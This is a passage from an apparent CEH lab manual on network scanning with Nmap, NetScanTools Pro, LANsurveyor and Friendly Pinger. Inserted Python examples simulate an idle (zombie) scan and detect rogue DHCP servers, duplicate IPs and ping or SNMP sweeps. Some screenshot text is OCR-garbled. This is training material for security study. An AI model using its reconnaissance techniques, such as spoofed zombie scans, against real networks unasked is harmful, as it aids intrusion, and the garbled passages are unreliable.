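Run it and compare the two stacks: against the RFC 793 model the Xmas and Null scans separate closed ports from open|filtered ones, against the Windows model every port comes back "closed", and the ACK scan reports "unfiltered" on both because neither host sits behind a stateful firewall in this model. That is the decision table to keep in mind when choosing a scan type for a given target platform.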

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Tool/Utility: Nmap

Information Collected/Objectives Achieved:

Types of scan used:
■ Intense scan
■ Xmas scan
■ Null scan
■ ACK Flag scan

Intense Scan - Nmap Output:
■ ARP Ping Scan - 1 host
■ Parallel DNS resolution of 1 host
■ SYN Stealth Scan
  ■ Discovered open ports on 10.0.0.4: 135/tcp, 139/tcp, 445/tcp, ...
■ MAC Address
■ Operating System Details
■ Uptime Guess
■ Network Distance
■ TCP Sequence Prediction
■ IP ID Sequence Generation
■ Service Info
... YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions

1. Analyze and evaluate the results by scanning a target network using:
   a. Stealth Scan (Half-open Scan)
   b. nmap -P

2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in the network.

Internet Connection Required
☐ Yes  ☑ No

Platform Supported
☑ Classroom  ☑ iLabs
Scanning a Network Using the NetScanTools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for network professionals.

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario

You have already seen in the previous lab how you can gather information such as the ARP ping scan result, MAC address, operating system details, IP ID sequence generation, service info, etc. through the Intense Scan, Xmas Scan, Null Scan, and ACK Flag Scan in Nmap. An attacker can also scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely, and if an intrusion detection report is generated, it will show the IP of the zombie host as the attacker. The attacker learns how many packets the zombie has sent since the last probe by checking the IP packet fragment identification number (IP ID), which is why the "IP ID Sequence Generation" line in the Intense scan output matters: only a host with a simple incremental counter is usable as a zombie.

As an expert penetration tester, you should be able to determine whether a TCP port is open by sending a SYN (session establishment) packet to the port. The target machine will respond with a SYN/ACK (session request acknowledgement) packet if the port is open and RST (reset) if the port is closed, and you should be prepared to block any such attacks on the network.

In this lab you will learn to scan a network using NetScanTools Pro. You will also discover the network and gather information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics.
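The following is an added example; it is not part of the lab manual and is not NetScanTools Pro or Nmap code. It models the idle (zombie) scan described in the scenario above: the attacker reads the zombie's IP ID before and after a spoofed SYN to the target, and the difference reveals the target port's state without the attacker's address ever reaching the target. Zombie, BusyZombie and Target are constructed simulations, not real hosts; Nmap's -sI implements the same logic with retries and a zombie-suitability check first.

```python
class Zombie:
    """Idle host whose IP ID counter increases by one for every packet it sends (constructed model)."""

    def __init__(self, start_ipid=1000):
        self.ipid = start_ipid
        self.sent = []          # (reason, ipid) log, handy when reading the output

    def _emit(self, reason):
        self.ipid += 1
        self.sent.append((reason, self.ipid))
        return self.ipid

    def receive(self, segment):
        """Unsolicited SYN/ACK gets an RST (consumes an IP ID); unsolicited RST is ignored."""
        if segment == "SYN-ACK":
            self._emit("rst-to-target")

    def probe_ipid(self):
        """Attacker sends SYN/ACK to the zombie; the zombie answers RST and so reveals its IP ID."""
        return self._emit("rst-to-attacker")


class BusyZombie(Zombie):
    """A zombie that is not idle: two unrelated packets leave it around every probe (constructed)."""

    def probe_ipid(self):
        self._emit("background")
        self._emit("background")
        return super().probe_ipid()


class Target:
    """Target host; the SYN it receives carries the zombie's address, so replies go to the zombie."""

    def __init__(self, open_ports, filtered_ports=()):
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive_syn(self, port, apparent_source):
        if port in self.filtered_ports:
            return                                   # firewall drops it: zombie hears nothing
        apparent_source.receive("SYN-ACK" if port in self.open_ports else "RST")


def idle_scan_port(zombie, target, port):
    """The three steps of one idle-scan probe; returns the Nmap-style state string."""
    before = zombie.probe_ipid()          # 1. learn the zombie's current IP ID
    target.receive_syn(port, zombie)      # 2. spoofed SYN to the target, "from" the zombie
    after = zombie.probe_ipid()           # 3. probe the zombie again
    delta = after - before
    if delta == 2:
        return "open"                     # zombie RST'd the target's SYN/ACK, then RST'd our probe
    if delta == 1:
        return "closed|filtered"          # only our own probe consumed an IP ID
    return "unusable"                     # zombie was not idle, or its IP ID is not incremental


def idle_scan(zombie, target, ports):
    return {port: idle_scan_port(zombie, target, port) for port in ports}


if __name__ == "__main__":
    target = Target(open_ports={80, 445}, filtered_ports={22})   # constructed port table
    print(idle_scan(Zombie(), target, [80, 445, 22, 8080]))
    print(idle_scan(BusyZombie(), target, [80]))
```

The BusyZombie case is the practical caveat: any other traffic leaving the zombie between the two probes shifts the IP ID and the measurement becomes meaningless, which is why the scan needs a host that is both idle and uses a single global incremental IP ID counter. An IDS on the target sees only the zombie's address in the SYN.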

Lab Objectives

The objective of this lab is to assist in troubleshooting, diagnosing, monitoring, and discovering devices on a network.

In this lab, you need to:
■ Discover IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs
■ Detect local ports
Lab Environment

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks.

To perform the lab, you need:
■ NetScanTools Pro located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ You can also download the latest version of NetScanTools Pro from the link http://www.netscantools.com/nstpromain.html
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Administrative privileges to run the NetScanTools Pro tool

Lab Duration

Time: 10 Minutes

Overview of Network Scanning

Network scanning is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network scanning serves to promote both the security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities.

NetScanTools Pro performs the following network scanning functions:
■ Monitoring network device availability
■ Reporting IP addresses, hostnames, domain names, and port scan results

Lab Tasks

TASK 1: Scanning the Network

Install NetScanTools Pro on your Windows Server 2012 machine. Follow the wizard-driven installation steps and install NetScanTools Pro.

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

Note: Active Discovery and Diagnostic Tools are tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.

FIGURE 7.1: Windows Server 2012 - Desktop view

2. Click the NetScanTools Pro app to open the NetScanTools Pro window.

S ta rt Administrator A

Server Windows Googfe H jperV NetScanT...


Manager PowwShel Chrome kb-uoa Pro Demo

h m o ‫וי‬ f*
Control Hjrpw-V
Pan*l
Mdchir*.

Q V
('nmittnd
I't. n.".‫־‬

e w rr
© *I

20‫ ז‬2

x-x-ac n 9
FIGURE 7.2 Windows Server 2012 - Apps

3. If you are using the Demo version of NetScanTools Pro, then click Start the DEMO

4. The Open or Create a New Results Database - NetScanTools Pro window will appear; enter a new database name in Database Name (enter new name here)

The database is created in the Results Database Directory; its file name is prefixed with NstProData- and has the file extension .db3.

5. Set a default directory for the results database file location, then click Continue

USB Version: start the software by locating nstpro.exe on your USB drive - it is normally in the /nstpro directory.

FIGURE 7.3: Setting a new database name for NetScanTools Pro

6. The NetScanTools Pro main window will appear as shown in the following figure


IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2001:4860:b006:69 (ipv6.google.com) or ::1 (internal loopback address).

FIGURE 7.4: Main window of NetScanTools Pro

7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appear with some information about the ARP Ping tool.

8. Click OK

ARP Ping is a useful tool capable of sending ARP packets to a target IP address, and it can also search for multiple devices sharing the same IP address on your LAN.

FIGURE 7.5: Selecting the Manual Tools option

9. Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp


Send Broadcast ARP, and then Unicast ARP - this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address.

The source IP address is your interface IP as defined in the Local IP selection box.

FIGURE 7.6: Result of ARP Ping

10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP Scan tool. Click OK
ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices.

FIGURE 7.7: Selecting ARP Scan (MAC Scan) option

11. Enter the range of IPv4 addresses in the Starting IPv4 Address and Ending IPv4 Address text boxes

12. Click Do Arp Scan


The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.

FIGURE 7.8: Result of ARP Scan (MAC Scan)
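Added example, not code from the lab or from NetScanTools Pro: it post-processes ARP Ping / ARP Scan result lines in the column layout of Figure 7.6 (the sample lines and the known-host baseline are constructed here) to flag the two things an administrator documents from this step, an IPv4 address answered by more than one MAC and devices that are not in the inventory.

```python
"""Flag duplicate IPv4 addresses and unknown devices in ARP scan results.

Added example (not NetScanTools Pro code). Sample data is constructed.
"""
import re
from collections import defaultdict

# Constructed sample, modelled on the result columns of the ARP Ping tool:
# index, IPv4 address, MAC address, response time (seconds), reply type.
ARP_RESULTS = """\
0  10.0.0.1  00:1e:2a:aa:bb:cc  0.002649  Broadcast
1  10.0.0.1  00:1e:2a:aa:bb:cc  0.002318  Unicast
2  10.0.0.2  00:50:56:11:22:33  0.003318  Unicast
3  10.0.0.2  b8:27:eb:44:55:66  0.002518  Unicast
4  10.0.0.7  00:15:5d:01:02:03  0.002649  Unicast
"""

# Constructed baseline: the IP -> MAC pairs the administrator expects to see.
KNOWN_HOSTS = {
    "10.0.0.1": "00:1e:2a:aa:bb:cc",   # gateway
    "10.0.0.2": "00:50:56:11:22:33",   # database VM
}

RESULT_LINE = re.compile(
    r"^\s*(?P<index>\d+)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>[0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})\s+"
    r"(?P<rtt>\d+\.\d+)\s+"
    r"(?P<kind>Broadcast|Unicast)\s*$"
)


def parse_arp_results(text):
    """Return one dict per well-formed result line; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = RESULT_LINE.match(line)
        if not m:
            continue
        rows.append({
            "index": int(m["index"]),
            "ip": m["ip"],
            # normalise MAC formatting so the same card is never counted twice
            "mac": m["mac"].lower().replace("-", ":"),
            "rtt": float(m["rtt"]),
            "kind": m["kind"],
        })
    return rows


def ip_to_macs(rows):
    """Map each IPv4 address to the sorted list of MACs that answered for it."""
    seen = defaultdict(set)
    for r in rows:
        seen[r["ip"]].add(r["mac"])
    return {ip: sorted(macs) for ip, macs in seen.items()}


def find_duplicate_ips(rows):
    """IPs with more than one responding MAC: an address conflict or a second
    device claiming the address (the case the ARP Ping tool's duplicate check looks for)."""
    return {ip: macs for ip, macs in ip_to_macs(rows).items() if len(macs) > 1}


def find_unexpected_devices(rows, known_hosts):
    """(ip, mac) pairs that do not match the baseline: new hosts or changed hardware."""
    unexpected = []
    for ip, macs in sorted(ip_to_macs(rows).items()):
        for mac in macs:
            if known_hosts.get(ip) != mac:
                unexpected.append((ip, mac))
    return unexpected


if __name__ == "__main__":
    rows = parse_arp_results(ARP_RESULTS)
    for ip, macs in find_duplicate_ips(rows).items():
        print(f"duplicate IP {ip}: answered by {', '.join(macs)}")
    for ip, mac in find_unexpected_devices(rows, KNOWN_HOSTS):
        print(f"unexpected device {ip} ({mac})")
```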

13. Click DHCP Server Discovery in the left panel. A window will appear with information about the DHCP Server Discovery tool. Click OK

DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP servers.

FIGURE 7.9: Selecting DHCP Server Discovery Tool option

14. Select all the Discover Options check boxes and click Discover DHCP Servers


NetScanner is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations.

FIGURE 7.10: Result of DHCP Server Discovery
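Added example, not code from the lab or from NetScanTools Pro: it checks DHCP Server Discovery results (a constructed sample in the column layout of Figure 7.10, extended with the Router IP and DNS IP discover options) against an assumed policy of authorized servers, gateway and DNS, so that an unknown server, or one offering a different gateway or DNS, is flagged.

```python
"""Flag unauthorized DHCP servers and off-policy offers in discovery results.

Added example (not NetScanTools Pro code). Sample data and policy are constructed.
"""
import csv
import io
import ipaddress

# Constructed sample in the order of the discovery result columns
# (DHCP Server IP, Server Hostname, Offered IP, Offered Subnet Mask),
# plus the Router IP and DNS IP values the Discover Options can collect.
DISCOVERY_RESULTS = """\
server_ip,server_hostname,offered_ip,subnet_mask,router_ip,dns_ip
10.0.0.1,10.0.0.1,10.0.0.7,255.255.255.0,10.0.0.1,10.0.0.1
10.0.0.66,,10.0.0.88,255.255.255.0,10.0.0.66,203.0.113.9
"""

# Constructed policy: the only DHCP server that should answer on this subnet,
# and the gateway / DNS addresses its offers must carry.
POLICY = {
    "authorized_servers": {"10.0.0.1"},
    "subnet": ipaddress.ip_network("10.0.0.0/24"),
    "router_ip": "10.0.0.1",
    "dns_ips": {"10.0.0.1"},
}


def parse_discovery(text):
    """Read the result list as CSV rows keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text)))


def check_offer(offer, policy):
    """Return the list of findings for one DHCP offer; an empty list means clean."""
    findings = []
    if offer["server_ip"] not in policy["authorized_servers"]:
        findings.append("unauthorized DHCP server")
    try:
        # strict=False lets a host address plus mask describe its network
        net = ipaddress.ip_network(
            f'{offer["offered_ip"]}/{offer["subnet_mask"]}', strict=False)
    except ValueError:
        findings.append("malformed offered address or mask")
        net = None
    if net is not None and net != policy["subnet"]:
        findings.append("offered address outside managed subnet")
    if offer["router_ip"] != policy["router_ip"]:
        findings.append("default gateway differs from policy")
    if offer["dns_ip"] not in policy["dns_ips"]:
        findings.append("DNS server differs from policy")
    return findings


def rogue_servers(offers, policy):
    """Map each server IP that produced at least one finding to its findings."""
    result = {}
    for offer in offers:
        findings = check_offer(offer, policy)
        if findings:
            result.setdefault(offer["server_ip"], []).extend(findings)
    return result


if __name__ == "__main__":
    for server, findings in rogue_servers(parse_discovery(DISCOVERY_RESULTS), POLICY).items():
        print(f"{server}: {'; '.join(findings)}")
```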

15. Click Ping Scanner in the left panel. A window will appear with information about the Ping Scanner tool. Click OK
Port Scanner is a tool designed to determine which ports on a target computer are active, i.e. being used by services or daemons.

FIGURE 7.11: Selecting Ping Scanner option

16. Select the Use Default System DNS radio button, and enter the range of IP addresses in the Start IP and End IP boxes

17. Click Start


Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device.

FIGURE 7.12: Result of the IP address scan

18. Click Port Scanner in the left panel. A window will appear with information about the Port Scanner tool. Click OK
Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query.

FIGURE 7.13: Selecting Port Scanner option

19. Enter the IP address in the Target Hostname or IP Address field and select the TCP Ports Only radio button

20. Click Scan Range of Ports


FIGURE 7.14: Result of Port Scanner

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: NetScanTools Pro

Information Collected/Objectives Achieved:

ARP Scan Results:

■ IPv4 Address
■ MAC Address
■ I/F Manufacturer
■ Hostname
■ Entry Type
■ Local Address

Information for Discovered DHCP Servers:

■ IPv4 Address: 10.0.0.7
■ Interface Description: Hyper-V Virtual Ethernet Adapter #2
■ DHCP Server IP: 10.0.0.1
■ Server Hostname: 10.0.0.1
■ Offered IP: 10.0.0.7
■ Offered Subnet Mask: 255.255.255.0


YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Does NetScanTools Pro support proxy servers or firewalls?

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Drawing Network Diagrams Using LANSurveyor

LANsurveyor discovers a network and produces a comprehensive network diagram that integrates OSI Layer 2 and Layer 3 topology data.
Lab Scenario

An attacker can gather information from ARP Scan, DHCP Servers, etc. using NetScanTools Pro, as you have learned in the previous lab. Using this information an attacker can compromise a DHCP server on the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration.

In this lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks.

Lab Objectives

The objective of this lab is to help students discover and diagram network topology and map a discovered network.

In this lab, you need to:

■ Draw a map showing the logical connectivity of your network and navigate around the map

■ Create a report that includes all your managed switches and hubs


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

To perform the lab, you need:

■ LANSurveyor located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor

■ You can also download the latest version of LAN Surveyor from the link http://www.solarwinds.com/

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser with Internet access

■ Administrative privileges to run the LANSurveyor tool

Lab Duration

Time: 10 Minutes

Overview of LANSurveyor

SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets, and addresses reporting needs for PCI compliance and other regulatory requirements.

TASK 1: Draw Network Diagram

Lab Tasks

Install LANSurveyor on your Windows Server 2012.

Follow the wizard-driven installation steps and install LANSurveyor.

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop

FIGURE 8.1: Windows Server 2012 - Desktop view

2. Click the LANSurveyor app to open the LANSurveyor window


LANsurveyor's Responder client manages remote Windows, Linux, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files.

FIGURE 8.2: Windows Server 2012 - Apps

3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation

LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)

FIGURE 8.3: LANSurveyor evaluation window

4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network


LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.

FIGURE 8.4: Getting Started with LANSurveyor wizard

5. The Create A Network Map window will appear; in order to draw a network diagram, enter the IP addresses in Begin Address and End Address, and click Start Network Discovery


LANsurveyor's network discovery discovers all network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address.

FIGURE 8.5: New Network Map window

6. The mapping process for the entered IP addresses will display as shown in the following figure

LANsurveyor is capable of discovering and mapping multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non-consecutive VLANs

FIGURE 8.6: Mapping progress window

7. LANsurveyor displays the map of your network


LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.

FIGURE 8.7: Resulting network diagram

Lab Analysis

Document all the IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during the lab.

Tool/Utility: LANSurveyor

Information Collected/Objectives Achieved:

IP address: 10.0.0.1 - 10.0.0.254

IP Nodes Details:

■ SNMP Send - 62
■ ICMP Ping Send - 31
■ ICMP Receipts - 4
■ Nodes Mapped - 4

Network Segment Details:

■ IP Address - 4
■ Domain Names - 4
■ Node Names - 4


YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Does LANSurveyor map every IP address to its corresponding switch or hub port?

2. Can nodes connected via wireless access points be detected and mapped?

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Mapping a Network Using Friendly Pinger

Friendly Pinger is a user-friendly application for network administration, monitoring, and inventory.
Lab Scenario

In the previous lab, you found the SNMP, ICMP Ping, Nodes Mapped, etc. details using the tool LANSurveyor. If an attacker is able to get hold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces on a router using the default community name public and disable them using the read-write community. SNMP MIBs include information about the identity of the agent's host, and an attacker can take advantage of this information to initiate an attack. Using the ICMP reconnaissance technique an attacker can also determine the topology of the target network. Attackers could use either the ICMP "Time exceeded" or "Destination unreachable" messages. Both of these ICMP messages can cause a host to immediately drop a connection.

A s a n e x p e r t Network Administrator a n d Penetration T e ste r y o u n e e d t o d i s c o v e r


n e t w o r k t o p o l o g y a n d p r o d u c e c o m p r e h e n s i v e n e t w o r k d ia g r a m s f o r d is c o v e r e d
n e t w o r k s a n d b lo c k a tt a c k s b y d e p lo y i n g fire w a lls 0 1 1 a n e t w o r k t o filte r u n - w a n t e d
tra ffic . Y o u s h o u l d b e a b le t o b l o c k o u t g o i n g S N M P tr a f f ic a t b o r d e r r o u t e r s o r
fire w a lls. 111 d iis la b , y o u w ill l e a n i t o m a p a n e t w o r k u s i n g d ie t o o l F r i e n d ly P in g e r .
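The reconnaissance described above (one source pinging many hosts, then querying SNMP on them) leaves a recognisable trace in host firewall logs. The following is an added example, not part of the lab manual: it parses constructed lines in the Windows Firewall pfirewall.log layout and flags any source that reaches several distinct hosts by ICMP echo or UDP/161 within a short window. The sample addresses, the 10-second window and the 3-host threshold are assumptions.

```python
"""Detect ICMP ping sweeps and SNMP probing in Windows Firewall log lines.

Added example, not part of the lab manual.  The record layout follows the
W3C-style '#Fields:' header that Windows Firewall writes to pfirewall.log;
the sample lines below are constructed to mirror the lab's 10.0.0.0/24 range.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, as if collected from the firewall logs of several lab
# hosts: 10.0.0.7 pings four hosts and then queries SNMP (UDP/161) on three
# of them; 10.0.0.2 pings one host three times (not a sweep); 10.0.0.1 answers
# with an ICMP "Time exceeded" (type 11), which must not count as a probe.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2012-08-22 11:22:30 ALLOW ICMP 10.0.0.7 10.0.0.1 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:22:30 ALLOW ICMP 10.0.0.7 10.0.0.2 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:22:31 ALLOW ICMP 10.0.0.7 10.0.0.3 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:22:32 ALLOW ICMP 10.0.0.7 10.0.0.5 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:22:33 ALLOW ICMP 10.0.0.1 10.0.0.7 - - 56 - - - - 11 0 - RECEIVE
2012-08-22 11:22:40 DROP UDP 10.0.0.7 10.0.0.2 52184 161 77 - - - - - - - RECEIVE
2012-08-22 11:22:40 DROP UDP 10.0.0.7 10.0.0.5 52185 161 77 - - - - - - - RECEIVE
2012-08-22 11:22:41 DROP UDP 10.0.0.7 10.0.0.1 52186 161 77 - - - - - - - RECEIVE
2012-08-22 11:23:00 ALLOW ICMP 10.0.0.2 10.0.0.7 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:23:01 ALLOW ICMP 10.0.0.2 10.0.0.7 - - 60 - - - - 8 0 - RECEIVE
2012-08-22 11:23:02 ALLOW ICMP 10.0.0.2 10.0.0.7 - - 60 - - - - 8 0 - RECEIVE
"""


def parse_records(log_text):
    """Yield one dict per data line, keyed by the column names taken from the
    '#Fields:' header.  Lines before a header, comment lines and lines with
    the wrong field count are skipped rather than guessed at."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def probe_kind(rec):
    """Classify a record: 'icmp_echo' for an echo request (type 8), 'snmp'
    for UDP/161, None for anything else (replies, 'Time exceeded', ...)."""
    if rec["protocol"] == "ICMP" and rec["icmptype"] == "8":
        return "icmp_echo"
    if rec["protocol"] == "UDP" and rec["dst-port"] == "161":
        return "snmp"
    return None


def detect_sweeps(log_text, window_seconds=10, min_targets=3):
    """Return {src_ip: {kind: peak_distinct_targets}} for every source that
    reached at least min_targets distinct destination hosts of one kind
    inside some window of window_seconds."""
    events = defaultdict(list)          # (src, kind) -> [(timestamp, dst)]
    for rec in parse_records(log_text):
        kind = probe_kind(rec)
        if kind is None:
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        events[(rec["src-ip"], kind)].append((ts, rec["dst-ip"]))

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for (src, kind), evs in events.items():
        evs.sort()
        peak = 0
        for i, (start, _) in enumerate(evs):
            # distinct destinations inside [start, start + window]
            targets = {dst for ts, dst in evs[i:] if ts - start <= window}
            peak = max(peak, len(targets))
        if peak >= min_targets:
            alerts.setdefault(src, {})[kind] = peak
    return alerts


if __name__ == "__main__":
    for src, kinds in detect_sweeps(SAMPLE_LOG).items():
        for kind, n in kinds.items():
            print(f"{src}: {kind} to {n} distinct hosts within 10 s")
```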

Lab Objectives

The objective of this lab is to help students discover and diagram network topology and map a discovered network.

In this lab, you need to:

■ Discover a network using discovery techniques

■ Diagram the network topology

■ Detect new devices and modifications made in network topology

■ Perform inventory management for hardware and software assets


Lab Environment

To perform the lab, you need:

■ Friendly Pinger located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger

■ You can also download the latest version of Friendly Pinger from the link http://www.kilievich.com/fpinger/download.htm

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser with Internet access

■ Administrative privileges to run the Friendly Pinger tool

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 10 Minutes

Overview of Network Mapping

Network mapping is the study of the physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems running on networks. This technique detects new devices and modifications made in network topology. You can perform inventory management for hardware and software assets.

Friendly Pinger performs the following to map the network:

■ Monitoring network devices availability

■ Notifies if any server wakes or goes down

■ Ping of all devices in parallel at once

■ Audits hardware and software components installed on the computers over the network

Lab Tasks

TASK 1: Draw Network Map

1. Install Friendly Pinger on your Windows Server 2012

2. Follow the wizard-driven installation steps and install Friendly Pinger.

3. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop


FIGURE 9.1: Windows Server 2012 - Desktop view

4. Click the Friendly Pinger app to open the Friendly Pinger window

[Screenshot: Windows Server 2012 Apps screen showing the Friendly Pinger tile]

FIGURE 9.2: Windows Server 2012 - Apps

You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.

Friendly Pinger will display the IP address of your computer and will offer an exemplary range of IP addresses for scanning.

5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration.

6. Click No

To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map.

[Screenshot: Friendly Pinger [Demo.map] main window showing the "Demonstration map" with Internet, Mail Server, Shortcut, Workstation and Workstation (small) devices]

FIGURE 9.3: FPinger Main Window


7. Select File from the menu bar and select the Wizard option

Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network.

[Screenshot: Friendly Pinger [Demo.map] File menu with the entries Wizard, New, Open, Reopen, Update, Save, Save As, Close, Close All, Save As Image, Print, Lock, Create Setup, Options and Exit]

FIGURE 9.4: FPinger Starting Wizard

Map occupies the most part of the window. Right-click it. In the appeared context menu select "Add" and then "Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture.

8. To create an initial mapping of the network, type a range of IP addresses in the specified field as shown in the following figure and click Next

[Screenshot: Wizard dialog. Local IP address: 10.0.0.7. The initial map will be created by query from DNS-server the information about following IP-addresses: 10.0.0.1-20. You can specify an exacter range of scanning to speed up this operation. For example: 10.129-135.1-5.1-10. Timeout: 1000. Timeout allows to increase searching, but you can miss some addresses. Help / Back / Next / Cancel]

The device is displayed as an animated picture if it is pinged, and as a black and white picture if it is not pinged.

FIGURE 9.5: FPinger Initializing IP address range

9. Then the wizard will start scanning the IP addresses in the network and list them.

10. Click Next
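To show what the wizard does behind the dialog, here is an added example that is not part of Friendly Pinger or the lab manual: it expands the wizard's per-octet range notation (10.0.0.1-20, 10.129-135.1-5.1-10), probes every address in parallel, and diffs two sweeps so new or vanished devices stand out. The probe is injectable; the offline demo uses a constructed set of live addresses matching the lab's results, and ping_probe, which wraps the OS ping command, is an assumption about your environment.

```python
"""Expand a Friendly Pinger style address range, sweep it in parallel and
diff two sweeps.  Added example, not the tool's own code."""
import ipaddress
import itertools
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor


def expand_range(spec):
    """Expand '10.0.0.1-20' or '10.129-135.1-5.1-10' into dotted addresses.
    Each of the four dotted parts is a number or an inclusive 'lo-hi' range;
    the last octet varies fastest, so the order matches the wizard's list."""
    parts = spec.strip().split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four dotted parts: {spec!r}")
    octets = []
    for part in parts:
        lo, sep, hi = part.partition("-")
        first = int(lo)
        last = int(hi) if sep else first
        if not 0 <= first <= last <= 255:
            raise ValueError(f"bad octet range {part!r} in {spec!r}")
        octets.append(range(first, last + 1))
    return [".".join(map(str, combo)) for combo in itertools.product(*octets)]


def ping_probe(ip, timeout_ms=1000):
    """One ICMP echo via the OS ping command (assumed to be on PATH).
    1000 ms is the wizard's default timeout; a shorter one scans faster but,
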